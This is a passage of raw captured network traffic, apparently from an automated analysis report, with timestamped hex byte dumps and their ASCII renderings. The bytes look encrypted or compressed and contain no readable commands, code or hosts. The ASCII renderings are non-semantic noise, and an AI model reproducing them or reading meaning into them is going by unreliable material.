                                                                                                        Data Ascii: 0i`(*9efoKOB_ZW3epITFEsFaE=ab(7(Uv%UTZ:p??1s&6,-saQ$-mc\Y?xVem(N:{=PK(n0)$\}F>hs8!Lk^&X?Rk'03L\`]L:n`
                                                                                                        2022-11-03 22:35:57 UTC148INData Raw: e1 5f c6 35 42 0a 25 c7 02 85 0c c0 f6 f8 50 f4 e9 14 64 84 29 77 ed 0b 9c a7 58 0c d7 1a 37 aa 1e 9e 9a a3 64 82 9a 25 44 e1 0e 31 1b 3a d6 fa 99 4e 95 4e 0b 41 08 e3 65 74 a4 57 ed 53 33 77 af 89 cb 48 9e 18 a0 36 3b 9a c0 bf 05 7e 7c 0f 85 09 5d b2 db 2e 9d 6d cc 90 f6 b7 92 5e 8a a8 cc bf a2 21 e1 d1 a7 6c 0c b7 b7 c3 19 5b 87 f9 93 cb 23 cb 10 6f cc f7 15 20 31 5c a3 8d 86 a0 13 70 a5 7b 59 94 ad 71 8c 37 90 a2 8f 91 6d fa 74 96 de fc 91 88 76 13 82 16 f9 77 16 9c 60 ac d0 76 6e 88 a5 7e e4 5b 2f ea 49 b1 ff 98 a6 ec a2 86 cc 17 fa 5e bc 36 16 dc 89 30 87 47 f8 c7 7e a7 e2 80 a7 d8 d0 fc 5b 5d c2 5b 53 c5 d5 b8 16 b7 ad 5c 9c 06 f9 4e d9 cb 78 47 58 72 24 ca 4a d2 f5 54 88 fc 3e 20 46 a8 25 93 fc 0d 7f 3d 74 db af 60 a9 d2 0f 02 7e b5 22 80 64 c6 95
                                                                                                        Data Ascii: _5B%Pd)wX7d%D1:NNAetWS3wH6;~|].m^!l[#o 1\p{Yq7mtvw`vn~[/I^60G~[][S\NxGXr$JT> F%=t`~"d
                                                                                                        2022-11-03 22:35:57 UTC156INData Raw: 0e 59 0d b7 0d 21 e7 a5 be 93 d9 7f 9c b0 31 b2 07 bd de ef 74 91 75 55 15 40 21 40 b5 21 8e dd 97 18 29 86 e0 aa 30 12 74 8a 49 7c a2 84 e7 d5 0b 77 8c cd 64 25 75 7a 25 1b 58 36 df 15 d2 54 cf 3a 1f ff 79 c8 d7 9e f6 da 63 65 7c af 8c 24 ea d9 63 e7 34 f4 cb 68 c8 1f a7 76 ee e3 35 35 5d ab f6 04 04 da 84 ed a0 1d 0e 04 5a 73 67 8b 44 e7 dc c5 d3 7e bb fc 66 f1 c8 2a e6 75 47 78 dc 68 ad 08 3c ca 0d ca 06 2e 5b b9 06 01 a0 20 4e 74 43 96 c6 ef 72 21 31 03 02 73 ae 79 47 33 7b 46 02 ca 9d b0 b4 5d 91 a3 b4 5b 8e 2c f9 fc 19 96 23 aa 7c 3b 78 f9 2a ff 15 43 eb 26 fb 62 57 84 ca 4d 5a 7f 08 df 77 53 79 28 6d dd 5c cb be af 26 88 14 bc 32 cf ec ca a3 20 84 54 57 99 28 ab c6 00 cc 0f fd 38 60 1a 72 3f 88 46 ee 9c 34 13 03 11 0b 64 5b 31 9d 73 a7 c3 92 b4 f3
                                                                                                        Data Ascii: Y!1tuU@!@!)0tI|wd%uz%X6T:yce|$c4hv55]ZsgD~f*uGxh<.[ NtCr!1syG3{F][,#|;x*C&bWMZwSy(m\&2 TW(8`r?F4d[1s
                                                                                                        2022-11-03 22:35:57 UTC164INData Raw: 82 9a 44 98 7d 25 cc ad 25 ca 3c 69 ab 57 d9 ad 0a 67 9e b1 5f 35 40 50 2b ca c5 65 e3 69 c5 2c 8b ab 3f e2 a1 87 44 5e bd 97 80 81 9b 57 77 70 e9 f0 f3 54 66 24 cd 05 50 8a 39 4f 74 94 e6 3a cc d6 9b f1 82 5a c4 23 dc 69 69 2d e1 c3 bb a0 c3 52 8b ab 64 d0 2f 0f b1 34 8c f8 89 09 8b 74 9d 3f a9 dc 88 8c b3 3b 58 51 83 5e 05 de c5 d2 c8 53 3b 72 31 ba a0 39 2f 31 53 d5 24 9e 29 9b 7d 9a 7d c4 2a 79 97 77 b4 4c 50 f4 97 48 b3 26 c3 8c 89 53 3c b6 55 67 29 e8 69 50 03 98 cb ee 60 f8 04 f7 e0 93 c5 12 a2 70 57 62 cf 4f 1c 64 d1 21 55 d0 b3 a6 fb aa 03 f2 d3 e7 c3 9b 7a 0c 06 d1 8e 1a 25 24 c7 95 f9 3d 03 0b 45 9b 09 11 23 3e a3 66 22 1e 67 ec ed 8f f1 14 cf 62 97 d5 ee ab 27 38 ab ff 0d a2 98 57 09 20 91 44 50 ae a7 8f 2a 08 07 fc 19 a7 7b 8e 28 26 f6 16 69
                                                                                                        Data Ascii: D}%%<iWg_5@P+ei,?D^WwpTf$P9Ot:Z#ii-Rd/4t?;XQ^S;r19/1S$)}}*ywLPH&S<Ug)iP`pWbOd!Uz%$=E#>f"gb'8W DP*{(&i
                                                                                                        2022-11-03 22:35:57 UTC172INData Raw: 17 2f 59 4b f8 2a ff 63 7b a4 d9 47 1f 40 2d 82 00 b3 0d 82 da 12 d2 b6 6b f4 45 a3 72 2b 8f b9 f6 37 07 63 e6 7f 73 45 37 13 5f 4e 03 b5 ae d8 b6 30 61 17 d6 e8 c7 81 aa e4 3d 9e bc 2a 07 91 51 c0 bd e9 c5 73 03 8d 8f b8 de 0f ae d2 9a 6a b8 bf 99 0d 2a c0 c3 fc 3c bc e5 41 8f a5 28 7b 3b 80 57 81 bf 2a 3a 2d 48 66 71 9f 6c c3 0d 69 4a 96 f0 e7 06 09 e8 d8 ee 62 38 db 2d f1 68 46 9f 9a cc af de 28 e0 eb a8 00 7c b3 74 a0 7b 5d 89 db f0 22 90 ac c4 0a 7a 3a 3b 72 f8 49 d3 35 20 4b ab 22 c5 cd 95 f6 31 5e 88 88 5c 16 17 a4 e6 fd 1a d0 31 d0 11 59 da 25 4b 5c 1f eb 5b 2e 0e af ae 99 06 4e c7 00 44 a9 db 81 91 d5 70 de 27 13 09 2a 18 01 b0 0e 4a ae 88 70 95 cd 0f 48 33 10 a6 c2 cf 1f 5a 5f db 92 40 2c 2b c1 2a 8d b8 35 32 62 e1 cf dc bd b1 f0 7c 22 9e 08 91
                                                                                                        Data Ascii: /YK*c{G@-kEr+7csE7_N0a=*Qsj*<A({;W*:-HfqliJb8-hF(|t{]"z:;rI5 K"1^\1Y%K\[.NDp'*JpH3Z_@,+*52b|"
                                                                                                        2022-11-03 22:35:57 UTC180INData Raw: 97 88 19 12 75 50 c1 38 ea e6 e6 44 a6 0e 2b 30 b6 53 d1 fc dc 8e 3e f6 db 52 da f4 e5 7b 5b 73 7d 69 3d 19 ce 95 df 43 3a 83 78 4f ac 5a 54 ac dc 2a ea 29 8b dd 9d b5 5c 05 0b 3a f2 e9 50 c1 23 e4 d4 86 ac d7 2a 8b a5 92 88 59 c7 91 ee 57 60 c9 e4 69 40 8a 7a 80 66 28 1c dd 23 f4 4b 04 8e 25 a1 03 97 98 cd d1 97 9b 26 2c 9a d0 49 b9 53 f0 74 d0 58 bd 35 cf 3b 1d f8 d7 f2 da 79 37 5e b4 c9 ea 56 1e d1 fc cb 80 3c 51 b4 f0 fb 1f 53 77 ba 88 ee 4c d6 62 d8 bc fe 73 7a 49 1b 17 0c d3 3f b0 dd ce 02 fb 52 41 a9 a6 ac c3 a7 88 14 a2 c3 44 d9 9d 2d af d4 49 3c 86 b0 a6 df 1b 7f 67 96 a0 f9 3e 66 da d8 6a 47 71 c7 58 d2 95 15 2a f6 0a e8 42 5e e7 7f 67 96 a0 f9 3e 66 da 38 2f fe 71 d9 83 f0 53 80 e5 46 c5 e5 45 60 25 51 54 65 03 e8 e2 e0 78 b6 53 d1 fc dc 8e 3e
                                                                                                        Data Ascii: uP8D+0S>R{[s}i=C:xOZT*)\:P#*YW`i@zf(#K%&,IStX5;y7^V<QSwLbszI?RAD-I<g>fjGqX*B^g>f8/qSFE`%QTexS>
                                                                                                        2022-11-03 22:35:57 UTC188INData Raw: e6 86 6f 60 b8 6d ed 56 fc ed 5a 20 0a 28 4f 6e 03 48 d5 d5 ce 68 4a 62 4e f3 90 8f e8 f9 70 72 a4 21 bf 12 d3 9a 69 14 82 85 12 0e c5 be 0b 61 2c a0 91 4e de 8c b3 64 50 a6 44 20 da 6e 45 f5 01 14 0c d1 f1 27 91 6b 1b 5a 62 59 c5 62 de d0 11 19 28 c2 d6 dc 30 6e 0a a0 9d 43 13 dd 3e af c9 ef 26 15 9d 9a 9d 69 ce 51 e7 2c 9f 64 7b 5a 66 31 88 90 66 54 93 c1 c1 50 1f e0 8e 54 41 5d cb 93 cf d6 41 c1 97 4c 9b 45 af 3f 74 51 9b 60 14 e2 66 dc dc c8 bb ca 85 79 2e a8 9d 81 1b 3b 89 2e 05 f0 41 42 64 55 c7 66 d5 12 07 a9 84 c7 e7 f7 48 b3 03 23 f7 ac 36 76 1a 9b 56 5a 39 6d 50 7e d1 7d f1 8d e9 b8 ee 7a bb 8c ca 5b 54 68 61 8f bb 0b 6d 7a 08 3d 66 77 63 ff b2 58 38 86 bd 2e f4 f6 89 6c da 5d 4c 44 26 d0 40 96 62 7b 2e 32 9d d6 73 30 4c 0c 3b 2a ed 56 65 75 89
                                                                                                        Data Ascii: o`mVZ (OnHhJbNpr!ia,NdPD nE'kZbYb(0nC>&iQ,d{Zf1fTPTA]ALE?tQ`fy.;.ABdUfH#6vVZ9mP~}z[Thamz=fwcX8.l]LD&@b{.2s0L;*Veu
                                                                                                        2022-11-03 22:35:57 UTC195INData Raw: 1a 7d 75 0d 7e 63 60 ff 73 74 19 e9 83 f9 5c 56 d7 23 82 6f 62 8e 15 85 8c ed eb 52 ae ee 5f fc 29 d5 32 95 9d 3b 46 c0 26 bb d8 bf d1 b0 15 6d 32 ec 32 63 4c 8f 5e 82 87 9f 47 84 15 75 45 66 66 3f 1e 63 69 d5 8a 53 ab a4 86 e8 f9 8e 89 12 83 64 49 46 fd 0a 01 19 22 1d 30 08 97 c8 43 84 91 14 eb c4 53 bd 36 8d 5c 63 36 83 36 5e a7 37 45 ad 84 91 66 6b 58 79 e6 83 37 91 ab 5a 15 b1 fe c8 80 0a 90 1f 42 f1 97 f6 29 ae 01 18 b4 ce dd 2c 9e 9f 22 da 86 53 bb 9c 2b 05 7e 73 3c cf 6f ae e3 59 1c 1d 92 00 9e 43 e2 4a 88 41 f6 2a 8e 9f 5e 1b 42 bb ef 44 2a 19 2c 90 44 eb 46 a8 4a 43 45 00 c2 02 fb 4b e3 ab a1 1f d5 16 63 2b ba b2 45 e0 8d d9 d4 ba ef d1 f6 65 6c 4a b6 88 f7 66 ff ca 73 1d 18 32 77 48 20 56 5c fa a8 6c 0e 93 e6 fd 5b 62 5d e6 1e d1 03 76 46 2b 41
                                                                                                        Data Ascii: }u~c`st\V#obR_)2;F&m22cL^GuEff?ciSdIF"0CS6\c66^7EfkXy7ZB),"S+~s<oYCJA*^BD*,DFJCEKc+EelJfs2wH V\l[b]vF+A
                                                                                                        2022-11-03 22:35:57 UTC203INData Raw: b4 b4 1f 51 ad 51 77 a1 82 a8 5e c1 9b af 14 52 08 e6 c8 8c 25 0e 8a 6b 39 f6 d4 f7 29 45 90 a9 91 36 2f f4 6b 30 52 e6 4d f3 0f 9c de c6 2b a1 0d 51 2f fe 60 6e a5 d8 dc b2 22 b3 60 ce 93 ae b9 76 4e 66 87 1b 3f 2b 94 ba 7c e0 63 a4 6e 4c e0 5a aa d9 60 c5 82 be c2 0d e8 64 98 9a 50 c5 83 1e 21 92 bd c8 90 7e 43 93 d7 05 70 c6 65 46 65 5f a7 4f ef fe 6f 1a f8 46 61 cb f2 c6 d6 e5 05 0e fa b3 b7 b7 d4 e3 c2 0d e8 64 98 9a 50 c5 e2 23 a4 a6 2d cd b0 9f 6d 9e ff ba 16 6c fe 5b 70 ac 6d de 8a 57 a9 d9 a1 ba ec d7 08 34 ee 05 d0 7b ec db a6 6a f0 2a 21 ad 71 69 6e 32 bb 3a 7c 46 58 14 5c ce 4e 9b d0 2a 61 4e 30 54 1e c2 f2 cf 6f 37 61 c5 a4 91 55 a7 3e c1 db 65 b3 69 15 e6 77 fa fb bd 1a f9 a7 f0 47 ae a5 31 55 42 b2 78 97 75 f9 dc bd e9 ed dd d5 8b 13 9c 43
                                                                                                        Data Ascii: QQw^R%k9)E6/k0RM+Q/`n"`vNf?+|cnLZ`dP!~CpeFe_OoFadP#-ml[pmW4{j*!qin2:|FX\N*aN0To7aU>eiwG1UBxuC
                                                                                                        2022-11-03 22:35:57 UTC211INData Raw: 86 d5 f0 c9 d6 ac f2 5a 54 a9 53 9f 1c c1 f3 a3 73 d1 84 e1 c1 d5 59 40 49 42 86 5d 82 f2 82 46 fd 8b 32 f1 aa 7d 7b 43 36 97 50 54 a7 a4 92 03 f9 5c fa 54 33 88 15 41 54 78 8a 09 a7 de 67 57 82 15 76 ed 4f 93 5f b8 6f e2 a9 af 5b 4a ac 43 37 e9 ee 1d 27 9f 93 18 03 ca 97 33 80 fa 6d 20 f2 4a 7e b8 ca 3d 53 a5 5b 01 9a 10 4d f7 87 a4 f1 e4 6a dc 92 79 d4 0e 30 df e1 51 eb ea c1 db bb 6e 7f 56 68 16 2a 46 eb bb 25 f9 b2 03 91 3c e3 84 eb 71 ee fa 66 a6 38 5e 3f 03 25 e1 23 97 aa 73 d7 9c a0 43 21 e8 20 28 e0 01 23 33 08 1e 45 62 22 ba e1 b6 7d 51 8d b1 dd 1b 1b 84 b4 5b d0 00 ba cf e4 2e 06 17 e9 c8 39 b1 32 1d b9 a8 6e a0 43 5c bf a9 af ae 5e 78 65 83 64 ad d3 aa b6 02 e4 88 4b 7b 4d 1a 5c 48 af a0 bf 08 58 64 9e b8 94 0d 62 11 8b 8f ac 7d bf 01 e5 76 6d
                                                                                                        Data Ascii: ZTSsY@IB]F2}{C6PT\T3ATxgWvO_o[JC7'3m J~=S[Mjy0QnVh*F%<qf8^?%#sC! (#3Eb"}Q[.92nC\^xedK{M\HXdb}vm
                                                                                                        2022-11-03 22:35:57 UTC219INData Raw: 27 02 b0 42 55 ab bd 58 06 00 db 6e cd f5 d8 2b c5 54 3a dd d4 17 9e 8b 7c 6f a5 a3 7f 8b 24 c0 d5 57 0f 92 92 d5 7d c0 02 68 81 63 59 56 31 6c ba 55 64 dc 52 b7 7a ed 07 bd 68 ed 95 e7 24 79 6a 74 c4 d5 a9 60 81 d9 8f 21 f8 5e 57 7f 24 fa df f9 12 70 0b 3e 33 ab b6 64 65 d4 cb e7 0b 28 44 aa ff 05 30 e2 17 9d de 9a ed 40 73 45 61 c0 e8 d1 67 ea ff e9 75 ed 4f c4 ad cd ce 1d 22 01 a8 35 14 5a 4f 84 4b 04 fe 52 4f 66 d0 14 ca 5a 82 af 7c f8 d2 64 87 e6 b3 98 53 6b 52 87 ea 5e 3d 3c f6 f8 89 60 18 8a 58 df 0b 3a 11 92 79 83 ca c8 a1 0f 51 3c 22 12 9f 14 a2 bd b1 95 12 10 16 fd f4 1b 0e 90 ba d8 23 ff f1 b6 28 09 39 a1 62 1e 71 96 c7 90 5b fe 79 35 2b ed 44 c1 12 66 23 ca bc be e9 a3 48 80 c6 f6 cf b0 b5 da 5f e3 13 64 22 75 55 b1 f8 d6 2e 4c 62 48 07 fc 21
                                                                                                        Data Ascii: 'BUXn+T:|o$W}hcYV1lUdRzh$yjt`!^W$p>3de(D0@sEaguO"5ZOKROfZ|dSkR^=<`X:yQ<"#(9bq[y5+Df#H_d"uU.LbH!
                                                                                                        2022-11-03 22:35:57 UTC227INData Raw: 20 ee 92 c2 20 c0 a5 4e d6 2c 3a 88 0e bc 9c ac c4 31 d3 4c 57 47 ec 92 57 85 9b 84 f0 e0 61 21 3e 3d 26 cb d5 e8 64 63 3c f4 3c b4 4a f2 a6 2f 9b c9 f4 96 76 cb c8 43 20 5e d3 0b b9 b3 ce e9 52 2d 3c 23 b8 3a d3 d5 1e 9c 3d 3e 2d 5a e6 02 b3 75 91 65 bc ca 98 8b c7 f6 33 6e 16 c9 d4 88 2b 7f 4c 31 1f 7c f3 33 2c 36 6d 2b a3 b3 f8 1f c7 00 35 aa 8e 11 9f ca ff 54 c1 fb a4 cd 31 2c 0e cf 3a 22 cb 19 70 6d a5 07 66 95 15 54 47 e8 b4 9e 61 02 d2 97 40 64 4a c3 fe f0 e1 68 d5 03 84 c0 4c df 91 c7 72 fa 79 e1 6e 69 aa 30 be 02 a4 3a 13 f8 0f c1 0a 33 5f 33 8e af 2b 8f a0 1e 0f bf bb ec 17 ae b4 49 71 98 11 3d 8f 12 0c 22 d7 51 fe 22 04 e6 b5 d5 8d 1d 4d db 2c b4 ff 2d 0a 5e e0 a9 a0 52 e6 f2 5b 55 1e 76 46 4e 2b ab 5b e6 1b 49 dc a2 62 42 d6 13 85 ac eb d7 f7
                                                                                                        Data Ascii: N,:1LWGWa!>=&dc<<J/vC ^R-<#:=>-Zue3n+L1|3,6m+5T1,:"pmfTGa@dJhLryni0:3_3+Iq="Q"M,-^R[UvFN+[IbB
                                                                                                        2022-11-03 22:35:57 UTC234INData Raw: fe ad 87 83 6b 34 26 ef 34 7f 8f af 32 4c 35 13 f5 3f 12 ae 5e cb 73 9b 22 2e 5f c8 f4 1e 83 63 01 f7 2f fa 8d 8c 61 c5 5c 5d 95 f1 50 c6 65 d3 a7 44 a6 f3 6b ff 5a 12 b5 33 1c 97 fe c7 38 6d f2 4d 64 09 6d 31 ee a5 9e b4 f2 20 92 19 dd 5d 94 6b 32 cf c2 bb 2a b8 9d b0 d8 ba c9 38 99 ad f2 22 f0 b3 90 ae e4 97 f9 29 86 b6 30 92 f1 f4 bb 51 db 31 aa fb 58 76 89 46 e1 70 71 e0 09 cf 2b 4f 50 03 e1 70 47 61 95 41 53 2b 71 e7 23 dd 4d 31 57 5a ea 2a ac 03 f3 87 32 e9 25 5e 41 50 92 86 ec a3 88 83 34 ec 34 78 9d 12 e8 e3 08 0d 53 92 c6 80 49 59 39 a1 8d b0 98 29 56 ee 62 91 f6 d7 df 60 ab c3 b9 f9 d0 0c ea 8c a5 e1 a3 93 e0 36 ed 39 bf e1 fc 52 c4 27 8a 67 e8 5c 99 fc d0 b5 1e 70 cf 4c 68 4b 22 19 44 e8 a5 36 9c da 9f 56 dd 92 ff 72 df 4d f6 1b be 42 50 02 83
                                                                                                        Data Ascii: k4&42L5?^s"._c/a\]PeDkZ38mMdm1 ]k2*8")0Q1XvFpq+OPpGaAS+q#M1WZ*2%^AP44xSIY9)Vb`69R'g\pLhK"D6VrMBP
                                                                                                        2022-11-03 22:35:57 UTC242INData Raw: 5f f6 b0 0e 2f 9a ba 75 22 35 75 04 44 33 53 96 f8 2e eb 52 cb b5 a2 9f 37 ee ea 00 41 10 bb e1 4b 28 49 69 2a 53 86 d4 37 e7 af a4 4b 3c 99 78 e2 05 a3 e0 0d 0b 73 49 db 97 3c ca 33 3f 91 bf 75 4c 3b 48 94 25 07 f6 fd b9 5b 5c e6 8f b1 a3 58 63 f5 ab 63 50 46 d1 b6 f0 18 4e 6c c9 c4 1a e8 d3 e4 c1 6c 10 36 2b 75 ec 08 b3 fc 32 0d 57 ab 3b 18 da ce bc b2 2a 8b 85 38 70 b7 ab 3d c8 7a 15 a2 16 46 06 ef 5a 1b fc 23 86 f4 40 75 9b 4f 68 e5 79 cd c1 f8 08 47 97 de 41 e0 ac 61 29 04 4a 70 a5 c6 54 2b a7 59 b7 65 62 71 8b 17 8e b0 db 46 d5 06 5e 3a 4a 6a bb 80 c8 95 bf 7b 69 97 37 73 aa da cf 30 9c 8c 36 0c 39 b0 52 32 41 16 90 58 53 1e 36 39 03 3c eb b9 b0 e9 d0 d4 f2 c1 be a5 3f 6d 78 2c fb 4c 31 5a cb f9 0a 5b 17 89 52 10 01 95 47 29 b4 2b 41 48 40 5b 52 4a
                                                                                                        Data Ascii: _/u"5uD3S.R7AK(Ii*S7K<xsI<3?uL;H%[\XccPFNll6+u2W;*8p=zFZ#@uOhyGAa)JpT+YebqF^:Jj{i7s069R2AXS69<?mx,L1Z[RG)+AH@[RJ
                                                                                                        2022-11-03 22:35:57 UTC250INData Raw: 60 af 90 9d 94 19 54 93 44 ed 90 bd 51 64 d2 3a 44 54 00 74 35 8e 06 55 b1 03 7b 29 30 f5 fa 92 9d 50 7a ae bb ff 59 aa 77 6b ce cf c6 43 b4 ff 6b 8d 92 15 ea 14 e6 bd b8 ed 50 10 9c 96 67 eb 0b 9d fd dc 6a d1 47 81 58 94 13 29 2f 69 d1 dd ad 0c 90 a9 e9 81 96 84 11 60 13 f9 eb 60 c9 68 26 ca 1c aa ec 3a ec 2e d4 30 ad 72 89 9a 43 a9 74 f5 9b cd af 77 a3 62 54 3c 0c 9e 7d d4 15 46 66 1c 5d 73 d8 ca 30 dd 08 68 94 f8 73 4f c5 68 f2 08 e5 b9 72 cf 10 ec 52 a5 4d a3 5b d5 16 78 b3 c1 50 0d ba 30 12 c6 67 79 31 86 1e 03 58 82 ab 56 86 5f d8 50 fd 42 23 7d 48 81 cf 76 08 a9 fb c2 76 a5 ee a8 08 35 20 4e 13 46 23 f7 45 96 c6 4c ef 14 c4 a4 e2 b0 e3 07 8f 5f 2b dd 81 50 b5 fd ce fc 4f 57 e4 a3 8f 1a d9 fd 67 02 71 b8 76 a2 cd af e0 a7 cd 40 df ff 74 70 d7 b2 cb
                                                                                                        Data Ascii: `TDQd:DTt5U{)0PzYwkCkPgjGX)/i``h&:.0rCtwbT<}Ff]s0hsOhrRM[xP0gy1XV_PB#}Hvv5 NF#EL_+POWgqv@tp
                                                                                                        2022-11-03 22:35:57 UTC258INData Raw: 27 ef 60 10 64 9b 9f a2 35 63 2a 37 4f f1 1a 9f a3 3d c2 2b 8d 97 42 80 b6 07 44 af 8e 3d 37 4f 9c 25 61 81 58 13 6c 86 d2 fd 54 ed d7 e8 79 f5 c8 73 92 65 95 fb 6c dd ca 6b e5 4d 87 d1 6b 7d 3b fd 28 6a ed d8 2c 0b ed 91 91 8c 09 6e 52 41 49 b3 6f 6e 08 a4 16 72 08 98 25 4b d0 e2 42 7a 09 c6 18 7e 7a 69 f2 2a 0e a0 0f fb 21 f9 7b 16 ac 87 28 8b 09 77 7b bc 45 91 40 1d 1b 3b e0 a9 6e 71 08 2b 51 6f 47 f9 23 84 bf 3d e3 1b af b7 ea f2 ec f4 3e d3 5e a4 72 43 21 36 09 24 a8 50 7b 62 54 0a b0 a2 7c b2 a1 9e 37 fb 71 1a ed db cb d0 db f5 48 18 be f0 71 ca d8 8a 10 c1 05 81 d3 0b 59 24 fa d8 78 17 50 b2 7c 1f 99 41 89 f3 d6 99 03 62 0e 5e ea a3 69 15 49 93 0b ba b8 d9 69 c7 39 62 dd 90 b5 fc 5e 30 b3 5c 06 da 57 9c d1 d7 ce 1d a1 fd 5e a9 62 32 57 41 ba 8e f9
                                                                                                        Data Ascii: '`d5c*7O=+BD=7O%aXlTyselkMk};(j,nRAIonr%KBz~zi*!{(w{E@;nq+QoG#=>^rC!6$P{bT|7qHqY$xP|Ab^iIi9b^0\W^b2WA
                                                                                                        2022-11-03 22:35:57 UTC266INData Raw: 47 29 3d 83 4e 06 f7 f5 4b a2 49 a8 9f fe 56 0c 29 12 90 17 63 b7 cc 01 10 55 2e a5 a1 39 03 e1 68 76 d1 3d 30 78 16 e5 12 e0 ff 84 88 bb df 3a 38 7c 3d 9c fa 44 77 52 74 3e 07 f3 bc 71 cf c9 bf ad 2f ce d0 49 56 36 e4 ae a5 35 4c 82 37 e6 fc 24 bf 72 25 ff 59 03 12 f3 bc 09 af f9 db 74 8e be 9d 6c 65 5a b8 db 4f 9f aa d7 50 de 38 7c be cc d7 fa d4 79 b3 6d 7c 27 77 72 83 8b 9a bc 57 82 5b 2a 5d 17 d8 23 6d d5 45 99 d1 39 67 7e 01 5b 3c 3f 5d b7 3b 16 d1 e4 08 bf 7e 34 cf 7a 96 74 5d b1 a9 bd 6f d1 80 a6 43 f9 3c 5a c6 ec 79 7e ae 3d e1 3c 4a 60 fc e8 6e b0 6f 8e f0 f7 a1 7d 18 75 e5 8c b9 de 0d 04 22 54 d3 26 90 52 fe 08 ab 0a 77 a2 46 df 13 03 11 f0 57 24 e4 e1 99 10 0b 99 df e4 f3 aa 96 9e 15 a5 fd 25 d7 c9 c7 9e 1e 87 6c 6a 1e be ee 4d fa ea b5 ae c3
                                                                                                        Data Ascii: G)=NKIV)cU.9hv=0x:8|=DwRt>q/IV65L7$r%YtleZOP8|ym|'wrW[*]#mE9g~[<?];~4zt]oC<Zy~=<J`no}u"T&RwFW$%ljM
                                                                                                        Data Ascii: !+~Hwl^qwNHv |AV6m'IWeC7_|AV6ma;xF' U4CLM^wOjo|!|AV6mY:lhD&O4CLMQ30Sq4CLMJFfW2wn J8'M(,U1AF5@!i,^4CLMr,?
                                                                                                        2022-11-03 22:35:57 UTC531INData Raw: a8 4d f5 4f 93 25 81 4f 32 86 a4 de 88 d3 f3 7b f5 f8 a2 56 0c 29 cb b4 63 41 9d 91 95 d1 99 a8 d9 a9 94 79 0c 4c 2b 6a 42 48 44 a9 07 28 2c c0 dd 51 00 1b 72 4b 2d a0 0c d7 f6 68 b4 4f 51 7f 4e a6 2a 5a 16 04 d0 be d7 19 f0 23 a6 c7 17 9b 6c d5 32 42 f2 7e aa 30 4a 88 5d 09 a9 eb 63 8b ae 36 18 b0 09 dd ca f2 0d 46 79 18 f9 5d 21 57 64 97 bb 0e 8c 04 4d a9 8a 47 99 2b cb b8 e0 20 fb 60 f4 81 af 50 30 f8 72 66 31 c3 4b 67 3b 84 5f 71 5b c8 42 6c 5a 1b 43 0b f8 e0 4a 4f 24 a8 0e a4 73 9d 15 00 5c e9 b4 51 5f 9c a7 4f ca d2 08 66 99 f3 25 90 ad e5 e9 be ec 48 cb 36 1f ad 65 b7 55 84 59 fd 40 c4 da 92 d6 69 f7 62 1e dc 7b a1 b4 d4 a4 76 84 a0 82 4a 2f f9 28 df 67 e3 c7 1a c4 e4 08 fb 01 e8 52 b7 5c 88 e3 04 4f 18 eb 20 ba 29 dd e0 ae 6a 5c dc 0c 5a 7d 23 8f
                                                                                                        Data Ascii: MO%O2{V)cAyL+jBHD(,QrK-hOQN*Z#l2B~0J]c6Fy]!WdMG+ `P0rf1Kg;_q[BlZCJO$s\Q_Of%H6eUY@ib{vJ/(gR\O )j\Z}#
                                                                                                        2022-11-03 22:35:57 UTC539INData Raw: 2e ec 59 56 b6 d4 e7 9f 79 24 d7 1f 9d a1 7c cd a6 3e 6a 7c 27 fc cc 7c 71 28 ea 40 e4 79 19 1d f5 c9 01 b0 69 94 08 14 a7 c3 5f 3f a7 18 90 43 23 c5 66 b5 1e cc 2c 90 b2 42 97 62 ec c1 cd b9 a8 8d df 43 f5 96 45 60 c9 b2 3f 23 23 79 bb 7b 4f 76 0d 0f 99 f0 39 02 8f 93 38 3a dd 58 1d 90 46 3a 02 ad 9a 72 13 2b bb 98 db cc 5d 54 f2 96 d9 4a 50 6e ec 25 2c 95 f8 4e 02 1f c3 03 1e 13 99 c7 12 dd 0f 41 3c 85 18 c3 86 f2 61 02 c6 a3 de b8 8d 38 05 d4 1c c0 2f bd be 8e c1 24 1e 57 df 44 fb 7d 63 d6 16 ad 9e 1a 85 95 3e 84 de 41 4c b2 2b 37 e5 e4 be 20 96 65 0f f0 38 ae 6b 8b ac 21 86 43 6f 2c 21 a8 e7 3d 0e 4d 6f 77 e9 a0 2f 5b 06 50 82 53 c7 89 71 87 3f 13 15 17 40 88 e5 f1 84 a3 c9 e9 73 f7 4f 4a 3a 06 c6 93 e2 0b 10 8d 6e a9 54 ed 84 d9 39 40 a2 41 e6 64 6e
                                                                                                        Data Ascii: .YVy$|>j|'|q(@yi_?C#f,BbCE`?##y{Ov98:XF:r+]TJPn%,NA<a8/$WD}c>AL+7 e8k!Co,!=Mow/[PSq?@sOJ:nT9@Adn
                                                                                                        2022-11-03 22:35:57 UTC547INData Raw: fc c7 9f 8e 1a f3 5b 12 31 63 28 75 cd 8c 58 fd ac 50 de 9e 9e 84 66 ef 9c 32 08 38 f6 e6 1e 7e 23 1b 3c 2d 38 2e b9 5e 2f ab 4e 53 bc 33 d6 b5 f4 99 20 eb fd d6 32 98 b8 14 24 c3 29 dc 4b 4d b3 ba ab 86 0f 25 1d d2 92 ee a5 b9 96 2e 2c 6c c9 7a 0d d3 1c 2d 32 44 b5 e0 15 c5 5c 79 d3 2c 55 5e d7 81 74 64 b5 71 43 2b a9 e9 09 e6 c3 af 21 ec 9c 86 fa 2e fb e0 19 0d 86 06 2b 8c 3a 3c d3 ec 94 05 df af 68 2f 24 f1 93 dc da 98 f1 4c 41 84 42 fd 82 9c 48 22 e4 53 6c be e2 8e ca e9 f4 9a 8d ac 3d 25 12 fb 09 f6 39 5c c7 d5 53 ce 82 95 38 f2 24 8e 4c cd 79 13 7f af 76 70 f3 8f 1e b1 fe 01 f5 13 15 63 67 57 4f 7c b5 4b 7b b5 cc a6 b5 65 79 6e d9 e6 2b 9f 97 89 2c 9a d9 be e5 a0 18 5d 06 f5 cc 98 7e 06 02 5e 84 c3 c2 9d ab 92 ce 91 8e 49 8b a0 3c 7e 3c f2 fd 3e 6b
                                                                                                        Data Ascii: [1c(uXPf28~#<-8.^/NS3 2$)KM%.,lz-2D\y,U^tdqC+!.+:<h/$LABH"Sl=%9\S8$LyvpcgWO|K{eyn+,]~^I<~<>k
